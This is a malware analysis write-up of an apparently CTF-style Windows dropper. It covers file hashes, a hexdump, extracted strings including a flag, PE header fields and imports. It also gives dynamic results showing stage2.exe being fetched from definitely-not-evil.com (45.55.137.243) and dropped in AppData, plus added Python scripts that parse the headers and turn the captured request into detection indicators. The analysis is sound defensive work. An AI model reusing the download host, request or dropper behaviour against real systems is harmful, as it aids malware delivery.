Malware Sample Analysis (29F228F3375C489A8A6E31203AB25787)

File hash:
MD5: 29F228F3375C489A8A6E31203AB25787
Sha1: 14D713A5C8A2FC01FA2F01D993A249B9FB292810
Sha256: EC905CB2CB8E9F74790ADDE2C138807F3A6CDBECD5735FA5035B547280D7DB79

Note: commands are shown in blue; important data is marked in purple.


Basic Static Analysis:

Determine the file type:

Using the file command:

test$ file Unknown
Unknown: PE32 executable (console) Intel 80386, for MS Windows

Using the file signature:

test$ hexdump Unknown


0000000 5a4d 0090 0003 0000 0004 0000 ffff 0000
0000010 00b8 0000 0000 0000 0040 0000 0000 0000
0000020 0000 0000 0000 0000 0000 0000 0000 0000
0000030 0000 0000 0000 0000 0000 0000 00d8 0000
0000040 1f0e 0eba b400 cd09 b821 4c01 21cd 6854
0000050 7369 7020 6f72 7267 6d61 6320 6e61 6f6e
0000060 2074 6562 7220 6e75 6920 206e 4f44 2053
0000070 6f6d 6564 0d2e 0a0d 0024 0000 0000 0000
0000080 4be3 9a53 2aa7 c93d 2aa7 c93d 2aa7 c93d
0000090 b7bc c9a3 2aa6 c93d b7bc c997 2aa1 c93d
00000a0 52ae c9ae 2aa2 c93d 2aa7 c93c 2ab5 c93d
00000b0 b7bc c992 2aa6 c93d b7bc c9a0 2aa6 c93d
00000c0 6952 6863 2aa7 c93d 0000 0000 0000 0000
00000d0 0000 0000 0000 0000 4550 0000 014c 0005
00000e0 7f3b 5b57 0000 0000 0000 0000 00e0 0103
00000f0 010b 000a 0600 0000 0400 0007 0000 0000
0000100 1150 0000 1000 0000 2000 0000 0000 0040
0000110 1000 0000 0200 0000 0005 0001 0000 0000
0000120 0005 0001 0000 0000 5000 0008 0400 0000
0000130 0000 0000 0003 8500 0000 0010 1000 0000

The first two bytes of the dump are printed as "5a4d". hexdump shows 16-bit little-endian words, so the file actually begins with the bytes 4D 5A, the ASCII characters "MZ", which identifies it as a Windows executable.

String Analysis:

test$ strings Unknown
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.CRT
@.rsrc
hX @
h` @
hd @
PQSW
hflagh{i_shtay_hout_htoo_hlateh_goth_nothhingh_in_hmy_bhrainj}
hp @
5h1@
=d1@
%X1@
-T1@
hP @
AppData
stage2.exe
Im totally malware
totally not malware
CreateFileA
FindResourceA
LoadResource
WriteFile
Sleep
SizeofResource
CreateProcessA
lstrcatA
GetEnvironmentVariableA
LockResource
CloseHandle
KERNEL32.dll
MessageBoxA
USER32.dll
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
IsProcessorFeaturePresent
Dimmaletyoufinishbut

!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.CRT
@.reloc
Qjph
5x @
=` @
SVSSh^
hL!@
5p @
=\ @
T$xRP
D$,j
|$`j
L$PQ
T$xRP
_^[3
definitely-not-evil.com
l00k_wh4t_y0u_m4d3_m3_d0
Content-Type: text/html
User-Agent:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
oh_tay
ExitProcess
KERNEL32.dll
LoadIconA
LoadCursorA
RegisterClassExA
CreateWindowExA
GetMessageA
TranslateMessage
DispatchMessageA
DestroyWindow
PostQuitMessage
BeginPaint
EndPaint
DefWindowProcA
USER32.dll
GetStockObject
CreateDIBSection
SetDIBits
CreateCompatibleDC
SelectObject
BitBlt
DeleteDC
DeleteObject
GDI32.dll
InternetOpenA
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
InternetReadFile
InternetCloseHandle
WININET.dll
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
IsProcessorFeaturePresent
[... the remainder of the strings output is non-printable binary data (resource bytes that happened to pass the strings length filter) and is omitted here ...]


PE Header Analysis:

Open PE-bear and load the PE.

DOS HEADER:

Magic Number: 5A4D. MS-DOS-compatible executable files set this value to 0x5A4D, which represents the ASCII characters "MZ"; MS-DOS headers are therefore sometimes referred to as MZ headers.

File address of new exe header (e_lfanew): a 4-byte offset into the file where the PE file header is located. This offset is what you use to locate the PE header in the file.

File Header:

Check:
Machine: indicates what type of machine the executable was built for.

Section Count (NumberOfSections): you need to know how many sections, more specifically how many section headers and section bodies, are in the file in order to extract the information easily. Each section header and section body is laid out sequentially in the file, so the number of sections is needed to determine where the section headers and bodies end.
This PE has 5 sections.


Time Date Stamp

Optional Header:

  • MajorLinkerVersion / MinorLinkerVersion. Indicates the version of the linker that linked this image.
  • SizeOfCode. Size of executable code.
  • SizeOfInitializedData. Size of initialized data.
  • SizeOfUninitializedData. Size of uninitialized data.
  • AddressOfEntryPoint. Of the standard fields, the AddressOfEntryPoint field is the most interesting for the PE file format. This field indicates the location of the entry point for the application and, perhaps more importantly to system hackers, the location of the end of the Import Address Table (IAT). The following function demonstrates how to retrieve the entry point of a Windows NT executable image from the optional header.

  • FileAlignment. Minimum granularity of chunks of information within the image file prior to loading. For example, the linker zero-pads a section body (raw data for a section) up to the nearest FileAlignment boundary in the file. This value is constrained to be a power of 2 between 512 and 65,535.
  • MajorOperatingSystemVersion. Indicates the major version of the Windows NT operating system.
  • MinorOperatingSystemVersion. Indicates the minor version of the Windows NT operating system.
  • MajorImageVersion. Used to indicate the major version number of the application.
  • MinorImageVersion. Used to indicate the minor version number of the application.
  • MajorSubsystemVersion. Indicates the Windows NT Win32 subsystem major version number.
  • MinorSubsystemVersion. Indicates the Windows NT Win32 subsystem minor version number.
  • Reserved1. Unknown purpose, currently not used by the system and set to zero by the linker.
  • SizeOfImage. Indicates the amount of address space to reserve in the address space for the loaded executable image. This number is influenced greatly by SectionAlignment. For example, consider a system having a fixed page size of 4096 bytes. If you have an executable with 11 sections, each less than 4096 bytes, aligned on a 65,536-byte boundary, the SizeOfImage field would be set to 11 * 65,536 = 720,896 (176 pages). The same file linked with 4096-byte alignment would result in 11 * 4096 = 45,056 (11 pages) for the SizeOfImage field. This is a simple example in which each section requires less than a page of memory. In reality, the linker determines the exact SizeOfImage by figuring each section individually. It first determines how many bytes the section requires, then it rounds up to the nearest page boundary, and finally it rounds the page count to the nearest SectionAlignment boundary. The total is then the sum of each section's individual requirement.
  • SizeOfHeaders. This field indicates how much space in the file is used for representing all the file headers, including the MS-DOS header, PE file header, PE optional header, and PE section headers. The section bodies begin at this location in the file.
  • CheckSum. A checksum value is used to validate the executable file at load time. The value is set and verified by the linker. The algorithm used for creating these checksum values is proprietary information and will not be published.
  • Subsystem. Field used to identify the target subsystem for this executable. Each of the possible subsystem values is listed in the WINNT.H file immediately after the IMAGE_OPTIONAL_HEADER structure.
  • DllCharacteristics. Flags used to indicate if a DLL image includes entry points for process and thread initialization and termination.
  • SizeOfStackReserve / SizeOfStackCommit / SizeOfHeapReserve / SizeOfHeapCommit. These fields control the amount of address space to reserve and commit for the stack and default heap. Both the stack and heap have default values of 1 page committed and 16 pages reserved. These values are set with the linker switches -STACKSIZE: and -HEAPSIZE:.
  • LoaderFlags. Tells the loader whether to break on load, debug on load, or the default, which is to let things run normally.
  • NumberOfRvaAndSizes. This field identifies the length of the DataDirectory array that follows. It is important to note that this field is used to identify the size of the array, not the number of valid entries in the array.
  • DataDirectory. The data directory indicates where to find other important components of executable information in the file. It is really nothing more than an array of IMAGE_DATA_DIRECTORY structures that are located at the end of the optional header structure. The current PE file format defines 16 possible data directories, 11 of which are now being used.
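As an added example (not part of the original write-up, and not PE-bear's code), the following Python script converts the hexdump printed earlier back into bytes and walks the DOS header, COFF file header and PE32 optional header by hand, i.e. the same fields PE-bear displays. Its only input is the page's own hexdump, so what it reports can be checked against the `file` output and the stated section count: 5 sections, i386, console subsystem, entry point RVA 0x1150 at image base 0x400000, PE32 magic 0x10b. The flag-name tables cover only the bits relevant to this sample; the section table itself starts at 0x1d0, beyond the 0x140 bytes the dump shows, so it is not parsed.

```python
import struct
from datetime import datetime, timezone

# hexdump(1) output of the sample's first 0x140 bytes, copied from the write-up.
# hexdump prints 16-bit little-endian words, so "5a4d" is the byte pair 4D 5A ("MZ").
HEXDUMP_TEXT = """\
0000000 5a4d 0090 0003 0000 0004 0000 ffff 0000
0000010 00b8 0000 0000 0000 0040 0000 0000 0000
0000020 0000 0000 0000 0000 0000 0000 0000 0000
0000030 0000 0000 0000 0000 0000 0000 00d8 0000
0000040 1f0e 0eba b400 cd09 b821 4c01 21cd 6854
0000050 7369 7020 6f72 7267 6d61 6320 6e61 6f6e
0000060 2074 6562 7220 6e75 6920 206e 4f44 2053
0000070 6f6d 6564 0d2e 0a0d 0024 0000 0000 0000
0000080 4be3 9a53 2aa7 c93d 2aa7 c93d 2aa7 c93d
0000090 b7bc c9a3 2aa6 c93d b7bc c997 2aa1 c93d
00000a0 52ae c9ae 2aa2 c93d 2aa7 c93c 2ab5 c93d
00000b0 b7bc c992 2aa6 c93d b7bc c9a0 2aa6 c93d
00000c0 6952 6863 2aa7 c93d 0000 0000 0000 0000
00000d0 0000 0000 0000 0000 4550 0000 014c 0005
00000e0 7f3b 5b57 0000 0000 0000 0000 00e0 0103
00000f0 010b 000a 0600 0000 0400 0007 0000 0000
0000100 1150 0000 1000 0000 2000 0000 0000 0040
0000110 1000 0000 0200 0000 0005 0001 0000 0000
0000120 0005 0001 0000 0000 5000 0008 0400 0000
0000130 0000 0000 0003 8500 0000 0010 1000 0000
"""

# IMAGE_FILE_HEADER, and IMAGE_OPTIONAL_HEADER32 up to SizeOfStackCommit
# (the 0x140 bytes in the dump end exactly there).
FILE_HEADER_FMT = "<HHIIIHH"
FILE_HEADER_FIELDS = ("Machine", "NumberOfSections", "TimeDateStamp", "PointerToSymbolTable",
                      "NumberOfSymbols", "SizeOfOptionalHeader", "Characteristics")
OPT_HEADER_FMT = "<HBBIIIIIIIIIHHHHHHIIIIHHII"
OPT_HEADER_FIELDS = (
    "Magic", "MajorLinkerVersion", "MinorLinkerVersion", "SizeOfCode", "SizeOfInitializedData",
    "SizeOfUninitializedData", "AddressOfEntryPoint", "BaseOfCode", "BaseOfData", "ImageBase",
    "SectionAlignment", "FileAlignment", "MajorOperatingSystemVersion",
    "MinorOperatingSystemVersion", "MajorImageVersion", "MinorImageVersion",
    "MajorSubsystemVersion", "MinorSubsystemVersion", "Win32VersionValue", "SizeOfImage",
    "SizeOfHeaders", "CheckSum", "Subsystem", "DllCharacteristics", "SizeOfStackReserve",
    "SizeOfStackCommit")
MACHINE_NAMES = {0x14C: "i386", 0x8664: "x86-64"}
SUBSYSTEM_NAMES = {2: "Windows GUI", 3: "Windows console"}
FILE_FLAGS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_FLAGS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}


def hexdump_to_bytes(text: str) -> bytes:
    """Turn default hexdump(1) output (offset + 16-bit LE words, '*' for squeezed rows) into bytes."""
    data, last_row = bytearray(), b""
    for line in text.splitlines():
        line = line.strip()
        if not line or line == "*":            # '*' marks rows identical to the previous one
            continue
        offset, *words = line.split()
        while len(data) < int(offset, 16):     # replay squeezed rows up to this offset
            if not last_row:
                raise ValueError("gap before any data row")
            data += last_row
        last_row = b"".join(int(w, 16).to_bytes(2, "little") for w in words)
        data += last_row
    return bytes(data)


def flag_names(value: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_headers(data: bytes) -> dict:
    """Walk MZ header -> e_lfanew -> 'PE\\0\\0' -> file header -> PE32 optional header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    fh_off = e_lfanew + 4
    fh = dict(zip(FILE_HEADER_FIELDS, struct.unpack_from(FILE_HEADER_FMT, data, fh_off)))
    oh_off = fh_off + struct.calcsize(FILE_HEADER_FMT)
    oh = dict(zip(OPT_HEADER_FIELDS, struct.unpack_from(OPT_HEADER_FMT, data, oh_off)))
    if oh["Magic"] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) optional headers are handled here")
    return {
        "e_lfanew": e_lfanew, "file_header": fh, "optional_header": oh,
        "machine": MACHINE_NAMES.get(fh["Machine"], hex(fh["Machine"])),
        "subsystem": SUBSYSTEM_NAMES.get(oh["Subsystem"], str(oh["Subsystem"])),
        "link_time_utc": datetime.fromtimestamp(fh["TimeDateStamp"], tz=timezone.utc).isoformat(),
        "file_flags": flag_names(fh["Characteristics"], FILE_FLAGS),
        "dll_flags": flag_names(oh["DllCharacteristics"], DLL_FLAGS),
        "entry_point_va": oh["ImageBase"] + oh["AddressOfEntryPoint"],
        "section_table_offset": oh_off + fh["SizeOfOptionalHeader"],   # 0x1d0, past the dump
    }


SAMPLE_HEADERS = parse_pe_headers(hexdump_to_bytes(HEXDUMP_TEXT))

if __name__ == "__main__":
    for key, value in SAMPLE_HEADERS.items():
        print(f"{key}: {value}")
```

Two of the decoded flags are worth noting for this sample: Characteristics 0x0103 means RELOCS_STRIPPED | EXECUTABLE_IMAGE | 32BIT_MACHINE (consistent with the first binary's section list having no .reloc), and DllCharacteristics 0x8500 lacks DYNAMIC_BASE, so the image always loads at 0x400000.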

 

 

Section Header:

Sections contain the content of the file, including code, data, resources, and other executable information.

The .rdata section represents read-only data, such as literal strings, constants, and debug directory information.
All other variables (except automatic variables, which appear on the stack) are stored in the .data section. Basically, these are application or module global variables.
The .edata section contains export data for an application or DLL. When present, this section contains an export directory for getting to the export information.

Imports:

The .idata section is import data, including the import directory and import address name table.


 

Two DLLs are imported. They are:

KERNEL32.dll
    CreateFileA - Creates or opens a file or I/O device.
    FindResourceA - Determines the location of a resource with the specified type and name in the specified module.
    LoadResource - Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.
    WriteFile - Writes data to the specified file or input/output (I/O) device.
    Sleep
    SizeofResource - Retrieves the size, in bytes, of the specified resource.
    CreateProcessA - Creates a new process and its primary thread. The new process runs in the security context of the calling process.
    lstrcatA - Appends one string to another.
    GetEnvironmentVariableA - Retrieves the contents of the specified variable from the environment block of the calling process.
    LockResource - Retrieves a pointer to the specified resource in memory.
    CloseHandle - Closes an open object handle.
    IsDebuggerPresent - Determines whether the calling process is being debugged by a user-mode debugger.
    SetUnhandledExceptionFilter - Enables an application to supersede the top-level exception handler of each thread of a process.
    TerminateProcess
    GetCurrentProcess
    UnhandledExceptionFilter
    IsProcessorFeaturePresent

USER32.dll
    MessageBoxA - Displays a modal dialog box that contains a system icon, a set of buttons, and a brief application-specific message, such as status or error information. The message box returns an integer value that indicates which button the user clicked.

KERNEL32.dll supplies 17 of the imported functions and USER32.dll supplies 1.



Other Vendors:

Most AV vendors flag the sample as "Malicious".

 

Dynamic Analysis:

After running the malware in an isolated environment:


Process Monitoring:

C:\Users\admin\AppData\Roaming\stage2.exe created a process.

stage2.exe is dropped on the system using the URL "/l00k_wh4t_y0u_m4d3_m3_d0".

HTTP Header:

URL: /l00k_wh4t_y0u_m4d3_m3_d0
Method: GET
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Host: definitely-not-evil.com
Cache-Control: no-cache

Network Monitoring:

Captured request (hex):
47 45 54 20 2F 6C 30 30 6B 5F 77 68 34 74 5F 79 30 75 5F 6D 34 64 33 5F 6D 33 5F 64 30 20 48 54 54 50 2F 31 2E 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 69 6E 36 34 3B 20 78 36 34 3B 20 72 76 3A 34 37 2E 30 29 20 47 65 63 6B 6F 2F 32 30 31 30 30 31 30 31 20 46 69 72 65 66 6F 78 2F 34 37 2E 30 0D 0A 48 6F 73 74 3A 20 64 65 66 69 6E 69 74 65 6C 79 2D 6E 6F 74 2D 65 76 69 6C 2E 63 6F 6D 0D 0A 43 61 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 0D 0A

Captured request (ASCII column; each "." is a non-printable byte, here CR/LF):
GET /l00k_wh4t_y0u_m4d3_m3_d0 HTTP/1.1..Content-Type: text/html..User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0..Host: definitely-not-evil.com..Cache-Control: no-cache....

Connection IP: 45.55.137.243
URL: http://definitely-not-evil.com/l00k_wh4t_y0u_m4d3_m3_d0
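As an added example (not part of the original write-up), the following Python decodes the captured request bytes above, parses the request line and headers, and pulls out the indicators a defender would feed into proxy or IDS rules (host, URI path, full URL, User-Agent). The two "oddity" heuristics at the end are my own, not the author's: a Content-Type header on a body-less GET and the absence of any Accept header are the kind of traits that separate a hand-built WinINet request like this one from real Firefox traffic, and they are exactly the fields a detection rule can key on.

```python
# Raw bytes of the request as captured in the network monitor above (the hex from
# the write-up, re-wrapped onto several lines; bytes.fromhex ignores whitespace).
CAPTURED_HEX = """
47 45 54 20 2F 6C 30 30 6B 5F 77 68 34 74 5F 79 30 75 5F 6D 34 64 33 5F 6D 33 5F 64 30 20 48 54 54 50 2F 31 2E 31 0D 0A
43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 6D 6C 0D 0A
55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 69 6E 36 34 3B 20 78 36 34 3B 20 72 76 3A 34 37 2E 30 29 20 47 65 63 6B 6F 2F 32 30 31 30 30 31 30 31 20 46 69 72 65 66 6F 78 2F 34 37 2E 30 0D 0A
48 6F 73 74 3A 20 64 65 66 69 6E 69 74 65 6C 79 2D 6E 6F 74 2D 65 76 69 6C 2E 63 6F 6D 0D 0A
43 61 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 0D 0A 0D 0A
"""


def parse_http_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into request line, header map and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: no blank line terminating the headers")
    lines = head.decode("ascii").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")          # split on the first ':' only,
        headers[name.strip().lower()] = value.strip()  # so "rv:47.0" in the UA survives
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def extract_iocs(req: dict) -> dict:
    """Network indicators in the form a proxy/IDS rule or blocklist would take."""
    host = req["headers"].get("host", "")
    return {"url": f"http://{host}{req['target']}", "host": host,
            "uri_path": req["target"],
            "user_agent": req["headers"].get("user-agent", "")}


def oddities(req: dict) -> list:
    """Heuristics (mine, not from the write-up) suggesting a hand-built request."""
    notes = []
    if req["method"] == "GET" and "content-type" in req["headers"] and not req["body"]:
        notes.append("Content-Type header on a body-less GET")
    if "accept" not in req["headers"]:
        notes.append("no Accept header, which browsers normally send with a page request")
    return notes


SAMPLE_REQUEST = parse_http_request(bytes.fromhex(CAPTURED_HEX))
SAMPLE_IOCS = extract_iocs(SAMPLE_REQUEST)

if __name__ == "__main__":
    print(SAMPLE_REQUEST["method"], SAMPLE_REQUEST["target"], SAMPLE_REQUEST["version"])
    for key, value in SAMPLE_IOCS.items():
        print(f"{key}: {value}")
    for note in oddities(SAMPLE_REQUEST):
        print("oddity:", note)
```

The decoded values should match the HTTP Header table above line for line; if they do not, the hex was transcribed wrongly, which is a useful sanity check on any capture pasted into a report.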

Registry Monitoring:


Keys deleted: 19483

